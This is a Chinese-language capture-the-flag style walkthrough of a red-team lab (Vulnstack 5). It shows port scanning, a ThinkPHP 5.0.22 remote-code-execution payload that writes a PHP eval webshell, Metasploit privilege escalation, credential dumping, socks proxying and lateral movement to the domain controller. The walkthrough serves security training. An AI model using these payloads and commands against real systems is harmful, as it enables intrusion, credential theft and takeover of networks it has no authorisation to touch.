0x00:前言ATT&CK第五个攻防靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。靶场详情:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/靶场环境:攻击机:192.168.1.10Win7:192.168.1.8 192.168.138.136Win2008:192.168.138.1380x01:信息收集对目标IP进行端口扫描,发现开启了80和3306端口nmap -Pn -A -T4 192.168.1.8访问192.168.1.8发现是一个thinkphp站点,对其进行目录扫描扫描到一个add.php,访问是一个大马,对其进行密码爆破,爆破出密码后,发现大马很多功能都用不了0x02:漏洞利用通过报错知道ThinkPHP版本为5.0.22,先进行漏洞验证http://192.168.1.8/index.php/ s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1漏洞利用发现存在漏洞,使用下面的payload直接写入一句话http://192.168.1.8/index.php/ s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 获取网站物理路径通过system函数写入一句话http://192.168.1.8/index.php/ s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "< php @eval; >" >C:/phpStudy/PHPTutorial/WWW/public/chan.php或者用php文件函数file_put_contents直接写入一句话http://192.168.1.8/index.php s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][]=%3C php%20@eval; %3E写入成功后,使用蚁剑进行连接,进行主机信息收集,发现该主机在域内,另一个IP为192.168.138.136使用MSF生一个木马,上传到蚁剑上运行MSF监听4444端口,成功获取到一个meterpreter使用getsystem命令提权成功,得到SYSTEM权限查看主机运行的进程,发现存在域管理员进程对主机进行密码抓取,成功抓取到域管理员密码切换到域成员进程进行域名信息搜集,域控为192.168.138.1380x03:横向渗透使用MSF自带模块搭建socks代理先在meterpreter中使用route进行查看当前靶机win7所在网段的信息使用route增加对应路由
route add 192.168.138.0 255.255.255.0 2 # 2是挂起session的编号
use auxiliary/server/socks_proxyset srvhost 127.0.0.1set version 4aexploit先进行存活主机探测,发现只有win7和域控win2008端口服务探测搭建好代理后,对域控进行端口服务扫描nmap -sT -sV -Pn -p 21,22,53,80,135,139,445,1433,3306,8080,3389 192.168.138.138发现开启了445端口,使用MSF的永恒之蓝模块进行攻击,但是失败了前面我们已经抓取到了域管理员的密码,使用wmicexec远程连接域控成功连接域控主机,获取域控权限。
